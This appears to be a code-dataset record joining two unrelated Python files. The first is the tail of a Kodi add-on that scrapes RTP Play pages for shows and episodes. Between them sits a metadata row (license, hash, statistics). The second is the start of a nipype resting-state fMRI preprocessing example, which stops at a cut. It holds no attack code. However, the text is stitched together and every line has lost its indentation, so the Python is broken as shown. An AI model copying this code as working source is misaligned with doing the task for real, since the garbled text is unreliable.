msgok(translate(30001),translate(30018))
if page_source:
match=re.compile('<a class="text-white" href="(.+?)" title=".+?">(.+?)</a>').findall(page_source)
totalit= len(match)
for urlsbase,titulo in match:
titulo = title_clean_up(titulo)
if selfAddon.getSetting('icon_plot') == 'true':
try:
html_source = abrir_url(base_url + urlsbase)
except: html_source = ''
if html_source:
try: thumbnail=re.compile('<img class="pull-left" src="(.+?)"').findall(html_source)[0]
except: thumbnail=''
sinopse= re.findall('id="promo">.+?\n.+?<p>(.*?)</p>', html_source, re.DOTALL)
if sinopse: information = { "Title": name,"plot": clean_html(title_clean_up(sinopse[0])) }
else: information = { "Title": name,"plot":translate(30026) }
addprograma(titulo,base_url + urlsbase,16,thumbnail,totalit,information)
else:
information = { "Title": name,"plot":translate(30026) }
thumbnail = ''
addprograma(titulo,base_url + urlsbase,15,thumbnail,totalit,information)
xbmcplugin.setContent(int(sys.argv[1]), 'tvshows')
setview('show-view')
else:
sys.exit(0)
def list_episodes(name,url,plot):
program_name = name.split('|')
if len(program_name) > 1: titulo = program_name[1].replace('[/COLOR]','').replace('[/B]','')
else: titulo = name
prog_id=re.compile('http://www.rtp.pt/play/p(.+?)/').findall(url)
if not prog_id: prog_id=re.compile('listProgram=(\d+)&').findall(url)
page_num = re.compile('&page=(\d+)&').findall(url)
if not page_num: current_page = '1'
else: current_page = page_num[0]
if ('recent' not in url) and ('popular' not in url) and ('procura?' not in url):
url='http://www.rtp.pt/play/bg_l_ep/?listDate=&listQuery=&listProgram='+prog_id[0]+'&listcategory=&listchannel=&listtype=recent&page='+current_page+'&type=all'
else:pass
print url
try:
source = abrir_url(url)
except: source=''; msgok(translate(30001),translate(30018))
if source:
match_geral = re.findall('<div class="lazy(.*?)</i></span>',source,re.DOTALL)
if match_geral:
totalit = len(match_geral)
for match in match_geral:
data = re.compile('<span class="small clearfix text-light">(.+?)</span>').findall(match)
lnk = re.compile('href="(.+?)" ').findall(match)
titulo_array = re.compile('title="(.+?)" ').findall(match)
if titulo_array:
if 'itemprop' not in titulo_array[0]:
titulo = title_clean_up(titulo_array[0])
img_tmp = re.compile('itemprop="image" src=".+?src=(.+?)&.+?"').findall(match)
if img_tmp: img = img_base_url + img_tmp[0]
else: img = ''
if data and lnk:
information = { "Title": titulo,"plot":plot,"aired":format_data(data[0]) }
addepisode('[B]' + titulo + '[COLOR blue] (' + title_clean_up(data[0]) +')' + '[/B][/COLOR]',base_url + lnk[0],17,img,totalit,information)
try:
next_url = 'http://www.rtp.pt/play/bg_l_ep/?listDate=&listQuery=&listProgram='+prog_id[0]+'&listcategory=&listchannel=&listtype=recent&page='+str(int(current_page)+1)+'&type=all'
try: source_next = abrir_url(next_url)
except: source_next = ''
if source_next:
if re.findall('itemscope itemtype="http://schema.org/TVSeries"',source_next):
addDir('[B][COLOR blue]'+translate(30028)+'|[/B][/COLOR]'+titulo,next_url,16,os.path.join(artfolder,'next.png'),1,pasta=True,informacion=information)
except: pass
xbmcplugin.setContent(int(sys.argv[1]), 'episodes')
setview('episodes-view')
def list_emissoes(urltmp):
try:
page_source = abrir_url(urltmp)
except:
page_source = ''
msgok(translate(30001),translate(30018))
if page_source:
program_list=re.findall('<section>(.+?)</section>',page_source,re.DOTALL)
if program_list:
match = re.findall('href="(.+?)".*?itemprop="name">(.+?)</b',program_list[1],re.DOTALL)
if match:
totalit = len(match)
for urlsbase,titulo in match:
if selfAddon.getSetting('icon_plot') == 'true':
try:
source = abrir_url(base_url + urlsbase)
sinopse=re.findall('id="promo">.+?\n.+?<p>(.*?)</p>', source, re.DOTALL)
if sinopse: plot = clean_html(title_clean_up(sinopse[0]))
information={ "Title": title_clean_up(titulo),"plot":plot }
try: thumbnail=img_base_url + re.compile('src=(.+?)&').findall(source)[0]
except: thumbnail=''
except: information={ "Title": title_clean_up(titulo),"plot":translate(30026) };thumbnail=''
else: information={ "Title": title_clean_up(titulo),"plot":translate(30026) };thumbnail=''
addepisode(title_clean_up(titulo),base_url + urlsbase,17,thumbnail,totalit,information)
xbmcplugin.setContent(int(sys.argv[1]), 'episodes')
setview('episodes-view')
else: msgok(translate(30001),translate(30032));sys.exit(0)
def pesquisa_emissoes():
if not xbmcvfs.exists(os.path.join(datapath,'searchemiss.txt')):
keyb = xbmc.Keyboard('', translate(30031))
keyb.doModal()
if (keyb.isConfirmed()):
search = keyb.getText()
encode=urllib.quote(search)
urltmp = base_url + '/play/pesquisa?c_t=&q=' + encode
save(os.path.join(datapath,'searchemiss.txt'),urltmp)
list_emissoes(urltmp)
else:
text = readfile(os.path.join(datapath,'searchemiss.txt'))
list_emissoes(text)
def pesquisa_programas():
if not xbmcvfs.exists(os.path.join(datapath,'searchprog.txt')):
keyb = xbmc.Keyboard('', translate(30031))
keyb.doModal()
if (keyb.isConfirmed()):
search = keyb.getText()
encode=urllib.quote(search)
urltmp = base_url + '/play/pesquisa?c_t=&q=' + encode
save(os.path.join(datapath,'searchprog.txt'),urltmp)
list_show_search(urltmp)
else:
text = readfile(os.path.join(datapath,'searchprog.txt'))
list_show_search(text)
def list_show_search(url):
try:
page_source = abrir_url(url)
except:
page_source = ''
msgok(translate(30001),translate(30018))
if page_source:
program_list=re.findall('<section>(.+?)</section>',page_source,re.DOTALL)
if program_list:
match = re.findall('href="(.+?)".*?itemprop="name">(.+?)</b',program_list[0],re.DOTALL)
if match:
totalit = len(match)
for urlsbase,titulo in match:
if selfAddon.getSetting('icon_plot') == 'true':
try:
source = abrir_url(base_url + urlsbase)
sinopse=re.findall('id="promo">.+?\n.+?<p>(.*?)</p>', source, re.DOTALL)
if sinopse: plot = clean_html(title_clean_up(sinopse[0]))
information={ "Title": title_clean_up(titulo),"plot":plot }
try: thumbnail=img_base_url + re.compile('src=(.+?)&').findall(source)[0]
except: thumbnail=''
except: information={ "Title": title_clean_up(titulo),"plot":translate(30026) };thumbnail=''
else: information={ "Title": title_clean_up(titulo),"plot":translate(30026) };thumbnail=''
addprograma(title_clean_up(titulo),base_url + urlsbase,16,thumbnail,totalit,information)
xbmcplugin.setContent(int(sys.argv[1]), 'tvshows')
setview('show-view')
else: msgok(translate(30001),translate(30032));sys.exit(0)
def get_show_episode_parts(name,url,iconimage):
try:
source = abrir_url(url)
except: source = ''
if source:
url_video_list = []
video_list = []
match = re.compile('href="(.+?)" title="Parte.+?" rel="nofollow"').findall(source)
print match
#match = re.compile("<a.+?href='(.+?)'><b>Parte</b>(.+?)</a>").findall(source)
if not match: url_video_list.append(url)
else:
for urlsbase in match:
url_video_list.append(base_url + urlsbase)
number_of_parts = len(url_video_list)
dp = xbmcgui.DialogProgress()
dp.create(translate(30001),translate(30033))
dp.update(0)
i=0
for part in url_video_list:
if dp.iscanceled(): dp.close()
i += 1
video_url = rtp_resolver(part)
if video_url: video_list.append(video_url)
else:pass
dp.update(int((float(i)/number_of_parts)*100), translate(30033))
try:
dp.update(100, translate(30033))
dp.close()
except: pass
playlist = xbmc.PlayList(1)
playlist.clear()
for video in video_list:
liz=xbmcgui.ListItem(name, iconImage="DefaultVideo.png", thumbnailImage=iconimage)
liz.setInfo('Video', {})
liz.setProperty('mimetype', 'video')
playlist.add(video, liz)
xbmcPlayer = xbmc.Player()
xbmcPlayer.play(playlist)
player = RTPPlayer(videoarray=video_list,mainurl=url)
player.play(playlist)
while player._playbackLock:
player._trackPosition()
xbmc.sleep(1000)
else:msgok(translate(30001),translate(30018));sys.exit(0)
|
gpl-2.0
| 1,384,147,035,772,757,500
| 39.08547
| 181
| 0.667271
| false
| 2.860628
| false
| false
| false
|
carolFrohlich/nipype
|
examples/rsfmri_vol_surface_preprocessing.py
|
2
|
42451
|
#!/usr/bin/env python
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
"""
====================================
rsfMRI: ANTS, FS, FSL, SPM, aCompCor
====================================
A preprocessing workflow for Siemens resting state data.
This workflow makes use of:
- ANTS
- FreeSurfer
- FSL
- SPM
- CompCor
For example::
python rsfmri_preprocessing.py -d /data/12345-34-1.dcm -f /data/Resting.nii
-s subj001 -o output -p PBS --plugin_args "dict(qsub_args='-q many')"
or
python rsfmri_vol_surface_preprocessing.py -f SUB_1024011/E?/func/rest.nii
-t OASIS-30_Atropos_template_in_MNI152_2mm.nii.gz --TR 2 -s SUB_1024011
--subjects_dir fsdata --slice_times 0 17 1 18 2 19 3 20 4 21 5 22 6 23
7 24 8 25 9 26 10 27 11 28 12 29 13 30 14 31 15 32 16 -o .
This workflow takes resting timeseries and a Siemens dicom file corresponding
to it and preprocesses it to produce timeseries coordinates or grayordinates.
This workflow also requires 2mm subcortical atlas and templates that are
available from:
http://mindboggle.info/data.html
specifically the 2mm versions of:
- `Joint Fusion Atlas <http://mindboggle.info/data/atlases/jointfusion/OASIS-TRT-20_jointfusion_DKT31_CMA_labels_in_MNI152_2mm_v2.nii.gz>`_
- `MNI template <http://mindboggle.info/data/templates/ants/OASIS-30_Atropos_template_in_MNI152_2mm.nii.gz>`_
"""
from __future__ import division, unicode_literals
from builtins import open, range, str
import os
from nipype.interfaces.base import CommandLine
CommandLine.set_default_terminal_output('allatonce')
from dicom import read_file
from nipype.interfaces import (spm, fsl, Function, ants, freesurfer)
from nipype.interfaces.c3 import C3dAffineTool
fsl.FSLCommand.set_default_output_type('NIFTI')
from nipype import Workflow, Node, MapNode
from nipype.interfaces import matlab as mlab
mlab.MatlabCommand.set_default_matlab_cmd("matlab -nodisplay")
# If SPM is not in your MATLAB path you should add it here
# mlab.MatlabCommand.set_default_paths('/software/matlab/spm12')
from nipype.algorithms.rapidart import ArtifactDetect
from nipype.algorithms.misc import TSNR
from nipype.interfaces.utility import Rename, Merge, IdentityInterface
from nipype.utils.filemanip import filename_to_list
from nipype.interfaces.io import DataSink, FreeSurferSource
import numpy as np
import scipy as sp
import nibabel as nb
imports = ['import os',
'import nibabel as nb',
'import numpy as np',
'import scipy as sp',
'from nipype.utils.filemanip import filename_to_list, list_to_filename, split_filename',
'from scipy.special import legendre'
]
def get_info(dicom_files):
from dcmstack.extract import default_extractor
"""Given a Siemens dicom file return metadata
Returns
-------
RepetitionTime
Slice Acquisition Times
Spacing between slices
"""
meta = default_extractor(read_file(filename_to_list(dicom_files)[0],
stop_before_pixels=True,
force=True))
return (meta['RepetitionTime'] / 1000., meta['CsaImage.MosaicRefAcqTimes'],
meta['SpacingBetweenSlices'])
def median(in_files):
"""Computes an average of the median of each realigned timeseries
Parameters
----------
in_files: one or more realigned Nifti 4D time series
Returns
-------
out_file: a 3D Nifti file
"""
import numpy as np
import nibabel as nb
average = None
for idx, filename in enumerate(filename_to_list(in_files)):
img = nb.load(filename)
data = np.median(img.get_data(), axis=3)
if average is None:
average = data
else:
average = average + data
median_img = nb.Nifti1Image(average / float(idx + 1), img.affine,
img.header)
filename = os.path.join(os.getcwd(), 'median.nii.gz')
median_img.to_filename(filename)
return filename
def bandpass_filter(files, lowpass_freq, highpass_freq, fs):
"""Bandpass filter the input files
Parameters
----------
files: list of 4d nifti files
lowpass_freq: cutoff frequency for the low pass filter (in Hz)
highpass_freq: cutoff frequency for the high pass filter (in Hz)
fs: sampling rate (in Hz)
"""
from nipype.utils.filemanip import split_filename, list_to_filename
import numpy as np
import nibabel as nb
out_files = []
for filename in filename_to_list(files):
path, name, ext = split_filename(filename)
out_file = os.path.join(os.getcwd(), name + '_bp' + ext)
img = nb.load(filename)
timepoints = img.shape[-1]
F = np.zeros((timepoints))
lowidx = int(timepoints / 2) + 1
if lowpass_freq > 0:
lowidx = np.round(lowpass_freq / fs * timepoints)
highidx = 0
if highpass_freq > 0:
highidx = np.round(highpass_freq / fs * timepoints)
F[highidx:lowidx] = 1
F = ((F + F[::-1]) > 0).astype(int)
data = img.get_data()
if np.all(F == 1):
filtered_data = data
else:
filtered_data = np.real(np.fft.ifftn(np.fft.fftn(data) * F))
img_out = nb.Nifti1Image(filtered_data, img.affine, img.header)
img_out.to_filename(out_file)
out_files.append(out_file)
return list_to_filename(out_files)
def motion_regressors(motion_params, order=0, derivatives=1):
"""Compute motion regressors upto given order and derivative
motion + d(motion)/dt + d2(motion)/dt2 (linear + quadratic)
"""
import numpy as np
out_files = []
for idx, filename in enumerate(filename_to_list(motion_params)):
params = np.genfromtxt(filename)
out_params = params
for d in range(1, derivatives + 1):
cparams = np.vstack((np.repeat(params[0, :][None, :], d, axis=0),
params))
out_params = np.hstack((out_params, np.diff(cparams, d, axis=0)))
out_params2 = out_params
for i in range(2, order + 1):
out_params2 = np.hstack((out_params2, np.power(out_params, i)))
filename = os.path.join(os.getcwd(), "motion_regressor%02d.txt" % idx)
np.savetxt(filename, out_params2, fmt=b"%.10f")
out_files.append(filename)
return out_files
def build_filter1(motion_params, comp_norm, outliers, detrend_poly=None):
"""Builds a regressor set comprisong motion parameters, composite norm and
outliers
The outliers are added as a single time point column for each outlier
Parameters
----------
motion_params: a text file containing motion parameters and its derivatives
comp_norm: a text file containing the composite norm
outliers: a text file containing 0-based outlier indices
detrend_poly: number of polynomials to add to detrend
Returns
-------
components_file: a text file containing all the regressors
"""
import numpy as np
import nibabel as nb
from scipy.special import legendre
out_files = []
for idx, filename in enumerate(filename_to_list(motion_params)):
params = np.genfromtxt(filename)
norm_val = np.genfromtxt(filename_to_list(comp_norm)[idx])
out_params = np.hstack((params, norm_val[:, None]))
try:
outlier_val = np.genfromtxt(filename_to_list(outliers)[idx])
except IOError:
outlier_val = np.empty((0))
for index in np.atleast_1d(outlier_val):
outlier_vector = np.zeros((out_params.shape[0], 1))
outlier_vector[index] = 1
out_params = np.hstack((out_params, outlier_vector))
if detrend_poly:
timepoints = out_params.shape[0]
X = np.empty((timepoints, 0))
for i in range(detrend_poly):
X = np.hstack((X, legendre(
i + 1)(np.linspace(-1, 1, timepoints))[:, None]))
out_params = np.hstack((out_params, X))
filename = os.path.join(os.getcwd(), "filter_regressor%02d.txt" % idx)
np.savetxt(filename, out_params, fmt=b"%.10f")
out_files.append(filename)
return out_files
def extract_noise_components(realigned_file, mask_file, num_components=5,
extra_regressors=None):
"""Derive components most reflective of physiological noise
Parameters
----------
realigned_file: a 4D Nifti file containing realigned volumes
mask_file: a 3D Nifti file containing white matter + ventricular masks
num_components: number of components to use for noise decomposition
extra_regressors: additional regressors to add
Returns
-------
components_file: a text file containing the noise components
"""
from scipy.linalg.decomp_svd import svd
import numpy as np
import nibabel as nb
import os
imgseries = nb.load(realigned_file)
components = None
for filename in filename_to_list(mask_file):
mask = nb.load(filename).get_data()
if len(np.nonzero(mask > 0)[0]) == 0:
continue
voxel_timecourses = imgseries.get_data()[mask > 0]
voxel_timecourses[np.isnan(np.sum(voxel_timecourses, axis=1)), :] = 0
# remove mean and normalize by variance
# voxel_timecourses.shape == [nvoxels, time]
X = voxel_timecourses.T
stdX = np.std(X, axis=0)
stdX[stdX == 0] = 1.
stdX[np.isnan(stdX)] = 1.
stdX[np.isinf(stdX)] = 1.
X = (X - np.mean(X, axis=0)) / stdX
u, _, _ = svd(X, full_matrices=False)
if components is None:
components = u[:, :num_components]
else:
components = np.hstack((components, u[:, :num_components]))
if extra_regressors:
regressors = np.genfromtxt(extra_regressors)
components = np.hstack((components, regressors))
components_file = os.path.join(os.getcwd(), 'noise_components.txt')
np.savetxt(components_file, components, fmt=b"%.10f")
return components_file
def rename(in_files, suffix=None):
from nipype.utils.filemanip import (filename_to_list, split_filename,
list_to_filename)
out_files = []
for idx, filename in enumerate(filename_to_list(in_files)):
_, name, ext = split_filename(filename)
if suffix is None:
out_files.append(name + ('_%03d' % idx) + ext)
else:
out_files.append(name + suffix + ext)
return list_to_filename(out_files)
def get_aparc_aseg(files):
"""Return the aparc+aseg.mgz file"""
for name in files:
if 'aparc+aseg.mgz' in name:
return name
raise ValueError('aparc+aseg.mgz not found')
def extract_subrois(timeseries_file, label_file, indices):
"""Extract voxel time courses for each subcortical roi index
Parameters
----------
timeseries_file: a 4D Nifti file
label_file: a 3D file containing rois in the same space/size of the 4D file
indices: a list of indices for ROIs to extract.
Returns
-------
out_file: a text file containing time courses for each voxel of each roi
The first four columns are: freesurfer index, i, j, k positions in the
label file
"""
from nipype.utils.filemanip import split_filename
import nibabel as nb
import os
img = nb.load(timeseries_file)
data = img.get_data()
roiimg = nb.load(label_file)
rois = roiimg.get_data()
prefix = split_filename(timeseries_file)[1]
out_ts_file = os.path.join(os.getcwd(), '%s_subcortical_ts.txt' % prefix)
with open(out_ts_file, 'wt') as fp:
for fsindex in indices:
ijk = np.nonzero(rois == fsindex)
ts = data[ijk]
for i0, row in enumerate(ts):
fp.write('%d,%d,%d,%d,' % (fsindex, ijk[0][i0],
ijk[1][i0], ijk[2][i0]) +
','.join(['%.10f' % val for val in row]) + '\n')
return out_ts_file
def combine_hemi(left, right):
"""Combine left and right hemisphere time series into a single text file
"""
import os
import numpy as np
lh_data = nb.load(left).get_data()
rh_data = nb.load(right).get_data()
indices = np.vstack((1000000 + np.arange(0, lh_data.shape[0])[:, None],
2000000 + np.arange(0, rh_data.shape[0])[:, None]))
all_data = np.hstack((indices, np.vstack((lh_data.squeeze(),
rh_data.squeeze()))))
filename = left.split('.')[1] + '_combined.txt'
np.savetxt(filename, all_data,
fmt=','.join(['%d'] + ['%.10f'] * (all_data.shape[1] - 1)))
return os.path.abspath(filename)
def create_reg_workflow(name='registration'):
"""Create a FEAT preprocessing workflow together with freesurfer
Parameters
----------
name : name of workflow (default: 'registration')
Inputs::
inputspec.source_files : files (filename or list of filenames to register)
inputspec.mean_image : reference image to use
inputspec.anatomical_image : anatomical image to coregister to
inputspec.target_image : registration target
Outputs::
outputspec.func2anat_transform : FLIRT transform
outputspec.anat2target_transform : FLIRT+FNIRT transform
outputspec.transformed_files : transformed files in target space
outputspec.transformed_mean : mean image in target space
"""
register = Workflow(name=name)
inputnode = Node(interface=IdentityInterface(fields=['source_files',
'mean_image',
'subject_id',
'subjects_dir',
'target_image']),
name='inputspec')
outputnode = Node(interface=IdentityInterface(fields=['func2anat_transform',
'out_reg_file',
'anat2target_transform',
'transforms',
'transformed_mean',
'segmentation_files',
'anat2target',
'aparc'
]),
name='outputspec')
# Get the subject's freesurfer source directory
fssource = Node(FreeSurferSource(),
name='fssource')
fssource.run_without_submitting = True
register.connect(inputnode, 'subject_id', fssource, 'subject_id')
register.connect(inputnode, 'subjects_dir', fssource, 'subjects_dir')
convert = Node(freesurfer.MRIConvert(out_type='nii'),
name="convert")
register.connect(fssource, 'T1', convert, 'in_file')
# Coregister the median to the surface
bbregister = Node(freesurfer.BBRegister(),
name='bbregister')
bbregister.inputs.init = 'fsl'
bbregister.inputs.contrast_type = 't2'
bbregister.inputs.out_fsl_file = True
bbregister.inputs.epi_mask = True
register.connect(inputnode, 'subject_id', bbregister, 'subject_id')
register.connect(inputnode, 'mean_image', bbregister, 'source_file')
register.connect(inputnode, 'subjects_dir', bbregister, 'subjects_dir')
"""
Estimate the tissue classes from the anatomical image. But use spm's segment
as FSL appears to be breaking.
"""
stripper = Node(fsl.BET(), name='stripper')
register.connect(convert, 'out_file', stripper, 'in_file')
fast = Node(fsl.FAST(), name='fast')
register.connect(stripper, 'out_file', fast, 'in_files')
"""
Binarize the segmentation
"""
binarize = MapNode(fsl.ImageMaths(op_string='-nan -thr 0.9 -ero -bin'),
iterfield=['in_file'],
name='binarize')
register.connect(fast, 'partial_volume_files', binarize, 'in_file')
"""
Apply inverse transform to take segmentations to functional space
"""
applyxfm = MapNode(freesurfer.ApplyVolTransform(inverse=True,
interp='nearest'),
iterfield=['target_file'],
name='inverse_transform')
register.connect(inputnode, 'subjects_dir', applyxfm, 'subjects_dir')
register.connect(bbregister, 'out_reg_file', applyxfm, 'reg_file')
register.connect(binarize, 'out_file', applyxfm, 'target_file')
register.connect(inputnode, 'mean_image', applyxfm, 'source_file')
"""
Apply inverse transform to aparc file
"""
aparcxfm = Node(freesurfer.ApplyVolTransform(inverse=True,
interp='nearest'),
name='aparc_inverse_transform')
register.connect(inputnode, 'subjects_dir', aparcxfm, 'subjects_dir')
register.connect(bbregister, 'out_reg_file', aparcxfm, 'reg_file')
register.connect(fssource, ('aparc_aseg', get_aparc_aseg),
aparcxfm, 'target_file')
register.connect(inputnode, 'mean_image', aparcxfm, 'source_file')
"""
Convert the BBRegister transformation to ANTS ITK format
"""
convert2itk = Node(C3dAffineTool(), name='convert2itk')
convert2itk.inputs.fsl2ras = True
convert2itk.inputs.itk_transform = True
register.connect(bbregister, 'out_fsl_file', convert2itk, 'transform_file')
register.connect(inputnode, 'mean_image', convert2itk, 'source_file')
register.connect(stripper, 'out_file', convert2itk, 'reference_file')
"""
Compute registration between the subject's structural and MNI template
This is currently set to perform a very quick registration. However, the
registration can be made significantly more accurate for cortical
structures by increasing the number of iterations
All parameters are set using the example from:
#https://github.com/stnava/ANTs/blob/master/Scripts/newAntsExample.sh
"""
reg = Node(ants.Registration(), name='antsRegister')
reg.inputs.output_transform_prefix = "output_"
reg.inputs.transforms = ['Rigid', 'Affine', 'SyN']
reg.inputs.transform_parameters = [(0.1,), (0.1,), (0.2, 3.0, 0.0)]
reg.inputs.number_of_iterations = [[10000, 11110, 11110]] * 2 + [[100, 30, 20]]
reg.inputs.dimension = 3
reg.inputs.write_composite_transform = True
reg.inputs.collapse_output_transforms = True
reg.inputs.initial_moving_transform_com = True
reg.inputs.metric = ['Mattes'] * 2 + [['Mattes', 'CC']]
reg.inputs.metric_weight = [1] * 2 + [[0.5, 0.5]]
reg.inputs.radius_or_number_of_bins = [32] * 2 + [[32, 4]]
reg.inputs.sampling_strategy = ['Regular'] * 2 + [[None, None]]
reg.inputs.sampling_percentage = [0.3] * 2 + [[None, None]]
reg.inputs.convergence_threshold = [1.e-8] * 2 + [-0.01]
reg.inputs.convergence_window_size = [20] * 2 + [5]
reg.inputs.smoothing_sigmas = [[4, 2, 1]] * 2 + [[1, 0.5, 0]]
reg.inputs.sigma_units = ['vox'] * 3
reg.inputs.shrink_factors = [[3, 2, 1]] * 2 + [[4, 2, 1]]
reg.inputs.use_estimate_learning_rate_once = [True] * 3
reg.inputs.use_histogram_matching = [False] * 2 + [True]
reg.inputs.winsorize_lower_quantile = 0.005
reg.inputs.winsorize_upper_quantile = 0.995
reg.inputs.float = True
reg.inputs.output_warped_image = 'output_warped_image.nii.gz'
reg.inputs.num_threads = 4
reg.plugin_args = {'qsub_args': '-l nodes=1:ppn=4'}
register.connect(stripper, 'out_file', reg, 'moving_image')
register.connect(inputnode, 'target_image', reg, 'fixed_image')
"""
Concatenate the affine and ants transforms into a list
"""
merge = Node(Merge(2), iterfield=['in2'], name='mergexfm')
register.connect(convert2itk, 'itk_transform', merge, 'in2')
register.connect(reg, 'composite_transform', merge, 'in1')
"""
Transform the mean image. First to anatomical and then to target
"""
warpmean = Node(ants.ApplyTransforms(), name='warpmean')
warpmean.inputs.input_image_type = 3
warpmean.inputs.interpolation = 'Linear'
warpmean.inputs.invert_transform_flags = [False, False]
warpmean.inputs.terminal_output = 'file'
warpmean.inputs.args = '--float'
warpmean.inputs.num_threads = 4
register.connect(inputnode, 'target_image', warpmean, 'reference_image')
register.connect(inputnode, 'mean_image', warpmean, 'input_image')
register.connect(merge, 'out', warpmean, 'transforms')
"""
Assign all the output files
"""
register.connect(reg, 'warped_image', outputnode, 'anat2target')
register.connect(warpmean, 'output_image', outputnode, 'transformed_mean')
register.connect(applyxfm, 'transformed_file',
outputnode, 'segmentation_files')
register.connect(aparcxfm, 'transformed_file',
outputnode, 'aparc')
register.connect(bbregister, 'out_fsl_file',
outputnode, 'func2anat_transform')
register.connect(bbregister, 'out_reg_file',
outputnode, 'out_reg_file')
register.connect(reg, 'composite_transform',
outputnode, 'anat2target_transform')
register.connect(merge, 'out', outputnode, 'transforms')
return register
"""
Creates the main preprocessing workflow
"""
def create_workflow(files,
target_file,
subject_id,
TR,
slice_times,
norm_threshold=1,
num_components=5,
vol_fwhm=None,
surf_fwhm=None,
lowpass_freq=-1,
highpass_freq=-1,
subjects_dir=None,
sink_directory=os.getcwd(),
target_subject=['fsaverage3', 'fsaverage4'],
name='resting'):
wf = Workflow(name=name)
# Rename files in case they are named identically
name_unique = MapNode(Rename(format_string='rest_%(run)02d'),
iterfield=['in_file', 'run'],
name='rename')
name_unique.inputs.keep_ext = True
name_unique.inputs.run = list(range(1, len(files) + 1))
name_unique.inputs.in_file = files
realign = Node(interface=spm.Realign(), name="realign")
realign.inputs.jobtype = 'estwrite'
num_slices = len(slice_times)
slice_timing = Node(interface=spm.SliceTiming(), name="slice_timing")
slice_timing.inputs.num_slices = num_slices
slice_timing.inputs.time_repetition = TR
slice_timing.inputs.time_acquisition = TR - TR / float(num_slices)
slice_timing.inputs.slice_order = (np.argsort(slice_times) + 1).tolist()
slice_timing.inputs.ref_slice = int(num_slices / 2)
# Comute TSNR on realigned data regressing polynomials upto order 2
tsnr = MapNode(TSNR(regress_poly=2), iterfield=['in_file'], name='tsnr')
wf.connect(slice_timing, 'timecorrected_files', tsnr, 'in_file')
# Compute the median image across runs
calc_median = Node(Function(input_names=['in_files'],
output_names=['median_file'],
function=median,
imports=imports),
name='median')
wf.connect(tsnr, 'detrended_file', calc_median, 'in_files')
"""Segment and Register
"""
registration = create_reg_workflow(name='registration')
wf.connect(calc_median, 'median_file', registration, 'inputspec.mean_image')
registration.inputs.inputspec.subject_id = subject_id
registration.inputs.inputspec.subjects_dir = subjects_dir
registration.inputs.inputspec.target_image = target_file
"""Use :class:`nipype.algorithms.rapidart` to determine which of the
images in the functional series are outliers based on deviations in
intensity or movement.
"""
art = Node(interface=ArtifactDetect(), name="art")
art.inputs.use_differences = [True, True]
art.inputs.use_norm = True
art.inputs.norm_threshold = norm_threshold
art.inputs.zintensity_threshold = 9
art.inputs.mask_type = 'spm_global'
art.inputs.parameter_source = 'SPM'
"""Here we are connecting all the nodes together. Notice that we add the merge node only if you choose
to use 4D. Also `get_vox_dims` function is passed along the input volume of normalise to set the optimal
voxel sizes.
"""
wf.connect([(name_unique, realign, [('out_file', 'in_files')]),
(realign, slice_timing, [('realigned_files', 'in_files')]),
(slice_timing, art, [('timecorrected_files', 'realigned_files')]),
(realign, art, [('realignment_parameters', 'realignment_parameters')]),
])
def selectindex(files, idx):
import numpy as np
from nipype.utils.filemanip import filename_to_list, list_to_filename
return list_to_filename(np.array(filename_to_list(files))[idx].tolist())
mask = Node(fsl.BET(), name='getmask')
mask.inputs.mask = True
wf.connect(calc_median, 'median_file', mask, 'in_file')
# get segmentation in normalized functional space
def merge_files(in1, in2):
out_files = filename_to_list(in1)
out_files.extend(filename_to_list(in2))
return out_files
# filter some noise
# Compute motion regressors
motreg = Node(Function(input_names=['motion_params', 'order',
'derivatives'],
output_names=['out_files'],
function=motion_regressors,
imports=imports),
name='getmotionregress')
wf.connect(realign, 'realignment_parameters', motreg, 'motion_params')
# Create a filter to remove motion and art confounds
createfilter1 = Node(Function(input_names=['motion_params', 'comp_norm',
'outliers', 'detrend_poly'],
output_names=['out_files'],
function=build_filter1,
imports=imports),
name='makemotionbasedfilter')
createfilter1.inputs.detrend_poly = 2
wf.connect(motreg, 'out_files', createfilter1, 'motion_params')
wf.connect(art, 'norm_files', createfilter1, 'comp_norm')
wf.connect(art, 'outlier_files', createfilter1, 'outliers')
filter1 = MapNode(fsl.GLM(out_f_name='F_mcart.nii',
out_pf_name='pF_mcart.nii',
demean=True),
iterfield=['in_file', 'design', 'out_res_name'],
name='filtermotion')
wf.connect(slice_timing, 'timecorrected_files', filter1, 'in_file')
wf.connect(slice_timing, ('timecorrected_files', rename, '_filtermotart'),
filter1, 'out_res_name')
wf.connect(createfilter1, 'out_files', filter1, 'design')
createfilter2 = MapNode(Function(input_names=['realigned_file', 'mask_file',
'num_components',
'extra_regressors'],
output_names=['out_files'],
function=extract_noise_components,
imports=imports),
iterfield=['realigned_file', 'extra_regressors'],
name='makecompcorrfilter')
createfilter2.inputs.num_components = num_components
wf.connect(createfilter1, 'out_files', createfilter2, 'extra_regressors')
wf.connect(filter1, 'out_res', createfilter2, 'realigned_file')
wf.connect(registration, ('outputspec.segmentation_files', selectindex, [0, 2]),
createfilter2, 'mask_file')
filter2 = MapNode(fsl.GLM(out_f_name='F.nii',
out_pf_name='pF.nii',
demean=True),
iterfield=['in_file', 'design', 'out_res_name'],
name='filter_noise_nosmooth')
wf.connect(filter1, 'out_res', filter2, 'in_file')
wf.connect(filter1, ('out_res', rename, '_cleaned'),
filter2, 'out_res_name')
wf.connect(createfilter2, 'out_files', filter2, 'design')
wf.connect(mask, 'mask_file', filter2, 'mask')
bandpass = Node(Function(input_names=['files', 'lowpass_freq',
'highpass_freq', 'fs'],
output_names=['out_files'],
function=bandpass_filter,
imports=imports),
name='bandpass_unsmooth')
bandpass.inputs.fs = 1. / TR
bandpass.inputs.highpass_freq = highpass_freq
bandpass.inputs.lowpass_freq = lowpass_freq
wf.connect(filter2, 'out_res', bandpass, 'files')
"""Smooth the functional data using
:class:`nipype.interfaces.spm.Smooth`.
"""
smooth = Node(interface=spm.Smooth(), name="smooth")
smooth.inputs.fwhm = vol_fwhm
wf.connect(bandpass, 'out_files', smooth, 'in_files')
collector = Node(Merge(2), name='collect_streams')
wf.connect(smooth, 'smoothed_files', collector, 'in1')
wf.connect(bandpass, 'out_files', collector, 'in2')
"""
Transform the remaining images. First to anatomical and then to target
"""
warpall = MapNode(ants.ApplyTransforms(), iterfield=['input_image'],
name='warpall')
warpall.inputs.input_image_type = 3
warpall.inputs.interpolation = 'Linear'
warpall.inputs.invert_transform_flags = [False, False]
warpall.inputs.terminal_output = 'file'
warpall.inputs.reference_image = target_file
warpall.inputs.args = '--float'
warpall.inputs.num_threads = 1
# transform to target
